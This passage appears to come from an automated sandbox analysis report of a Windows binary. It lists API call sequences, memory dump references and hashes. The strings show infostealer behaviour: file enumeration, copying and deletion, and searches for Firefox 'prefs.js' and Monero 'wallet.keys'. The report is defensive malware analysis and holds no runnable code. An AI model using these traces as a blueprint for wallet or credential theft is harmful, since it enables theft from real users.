                                      • wsprintfA.USER32 ref: 00D43B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D43B33
                                      • lstrcat.KERNEL32(?,?), ref: 00D43B85
                                      • StrCmpCA.SHLWAPI(?,00D50F58), ref: 00D43B97
                                      • StrCmpCA.SHLWAPI(?,00D50F5C), ref: 00D43BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D43EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00D43ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: e2513db76d5726cbf94d87779bb9d67a422a6925f8b1975b57b99c887ac20758
                                      • Instruction ID: 1416467e49b6a894e9ecc181f900ddfada9cc385001be8ed1ad779e152ab6e23
                                      • Opcode Fuzzy Hash: e2513db76d5726cbf94d87779bb9d67a422a6925f8b1975b57b99c887ac20758
                                      • Instruction Fuzzy Hash: FAA13171A002089BDB35DFA8DC85FEA7379EB48301F044598BA4D96185DB75AB88CF71
                                      APIs
                                      • wsprintfA.USER32 ref: 00D44B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D44B93
                                      • StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D44BC1
                                      • StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D44DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00D44DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 309b225b334b84952a96dad8a412300db0b2bd8fe9437ed0d94035dc5502ce1f
                                      • Instruction ID: 69599acd122c5ef9fbbba53a7b62d4f287651c1f1f84edd7409e4d42615aa990
                                      • Opcode Fuzzy Hash: 309b225b334b84952a96dad8a412300db0b2bd8fe9437ed0d94035dc5502ce1f
                                      • Instruction Fuzzy Hash: E8615872900118ABCB34EBA4DC45FEA777CEF48701F048588F64996144EB75AB88CFB1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D447D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D447D7
                                      • wsprintfA.USER32 ref: 00D447F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D4480D
                                      • StrCmpCA.SHLWAPI(?,00D50FAC), ref: 00D4483B
                                      • StrCmpCA.SHLWAPI(?,00D50FB0), ref: 00D44851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D448DB
                                      • FindClose.KERNEL32(000000FF), ref: 00D448F0
                                      • lstrcat.KERNEL32(?,0167E888), ref: 00D44915
                                      • lstrcat.KERNEL32(?,0167D860), ref: 00D44928
                                      • lstrlen.KERNEL32(?), ref: 00D44935
                                      • lstrlen.KERNEL32(?), ref: 00D44946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 5228039fc7315a06e33c2990fb6e5ba36bf9a613362adb63803e411fa2e95ab7
                                      • Instruction ID: c102afafdde9e92a26a893aba0830237c9e5a5deaae7a625366ba4aa9446ec65
                                      • Opcode Fuzzy Hash: 5228039fc7315a06e33c2990fb6e5ba36bf9a613362adb63803e411fa2e95ab7
                                      • Instruction Fuzzy Hash: D85156715402189BCB25EB74DC89FED777CEB58300F404588B68996184DB79EB88CFB1
                                      APIs
                                      • wsprintfA.USER32 ref: 00D44113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D4412A
                                      • StrCmpCA.SHLWAPI(?,00D50F94), ref: 00D44158
                                      • StrCmpCA.SHLWAPI(?,00D50F98), ref: 00D4416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D442BC
                                      • FindClose.KERNEL32(000000FF), ref: 00D442D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: f06295ba96e640c057c47e59a428ee981fcc5e0266e1fe0322a406c41dbf33f5
                                      • Instruction ID: 8821a9f5de7f08a83581cca7ac7c1c3f90e8c4f24a87f789a8d726b8bc1fa42c
                                      • Opcode Fuzzy Hash: f06295ba96e640c057c47e59a428ee981fcc5e0266e1fe0322a406c41dbf33f5
                                      • Instruction Fuzzy Hash: 325147B1500218ABCB25EBB4DC89EEE737CFB54300F404688B69996044DB75AB89CF74
                                      APIs
                                      • wsprintfA.USER32 ref: 00D3EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00D3EE55
                                      • StrCmpCA.SHLWAPI(?,00D51630), ref: 00D3EEAB
                                      • StrCmpCA.SHLWAPI(?,00D51634), ref: 00D3EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00D3F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 319baddedba335ffb3925c20e54f83e24d0780f911aff957a424b2f69ec16097
                                      • Instruction ID: 47e3743fdf5343ce0a695dae58bc7d07cd94e8aecad64c24fb213cea9cf36693
                                      • Opcode Fuzzy Hash: 319baddedba335ffb3925c20e54f83e24d0780f911aff957a424b2f69ec16097
                                      • Instruction Fuzzy Hash: DFE1FE729511289BEB54FB64CCA2EEE7339EF54340F4045D9B50A62092EE306F89CF72
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: 3f5ecda417dcbeb1693c58f8a1fa27f3be389e281d727155e31aee8af694ab91
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: 61E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D516B0,00D50D97), ref: 00D3F81E
                                      • StrCmpCA.SHLWAPI(?,00D516B4), ref: 00D3F86F
                                      • StrCmpCA.SHLWAPI(?,00D516B8), ref: 00D3F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00D3FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: d606cf250da0940367987b1b30fdf377999c9eb153e95bc80d1e5b1f25b6bed9
                                      • Instruction ID: 8b18d71e396c19cb2acda3e2620a4426c58dd4b3fe4d67a4ac9f530007062af3
                                      • Opcode Fuzzy Hash: d606cf250da0940367987b1b30fdf377999c9eb153e95bc80d1e5b1f25b6bed9
                                      • Instruction Fuzzy Hash: 5FB122729401189BDB24FF64DD96FEE7379EF54300F0045A9A50A56181EF35AB48CFB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 'U?$*auI$.]Y7$=`qu$@<+$F&>$IBh$MV]]$_wo[$:S}$jK
                                      • API String ID: 0-147113015
                                      • Opcode ID: a2cf0fff299b685a5f4b9b1a937b54fc4ce6c24c5522a4e7c4b2b35cdd6e83d5
                                      • Instruction ID: f2c0d259dd0a3e9faf92d4adb583b719945c2476f4a9e2395d0a37469388e02f
                                      • Opcode Fuzzy Hash: a2cf0fff299b685a5f4b9b1a937b54fc4ce6c24c5522a4e7c4b2b35cdd6e83d5
                                      • Instruction Fuzzy Hash: B0B218F360C204AFE3046E2DEC8567AFBE9EB98720F16453DEAC5C3744EA7558048693
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D5523C,?,?,?,00D552E4,?,?,00000000,?,00000000), ref: 00D31963
                                      • StrCmpCA.SHLWAPI(?,00D5538C), ref: 00D319B3
                                      • StrCmpCA.SHLWAPI(?,00D55434), ref: 00D319C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D31D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D31E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D31E60
                                      • FindClose.KERNEL32(000000FF), ref: 00D31E72
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                       • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 57b57b2679e4f2f6bf35707b3320de5683221251837e85f9952a7d52d6e8cb2f
                                      • Instruction ID: 505449d8ef3fb29e46824f18a7d009bc593b0c68ad48b578eff7b2cf4149045f
                                      • Opcode Fuzzy Hash: 57b57b2679e4f2f6bf35707b3320de5683221251837e85f9952a7d52d6e8cb2f
                                      • Instruction Fuzzy Hash: 6A121A769505289BDB29FB64CCA6AEE7379EF54300F4045E9B50A62091EF306B88CF71
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00D50C32), ref: 00D3DF5E
                                      • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3DFAE
                                      • StrCmpCA.SHLWAPI(?,00D515C4), ref: 00D3DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00D3E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 1a70e71bc91827f85fae58798e1a71b465921301a17f9c075a8e0695ee6f6765
                                      • Instruction ID: 1f1822cc7145e52b0d0ddd8587fe8f9bceb684d1346f67ce146bffb3b0f79e3f
                                      • Opcode Fuzzy Hash: 1a70e71bc91827f85fae58798e1a71b465921301a17f9c075a8e0695ee6f6765
                                      • Instruction Fuzzy Hash: 28F1B9759505289BDB29FB64CDA6EEE7339EF54340F4045DAA40A62091EF306F88CF72
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
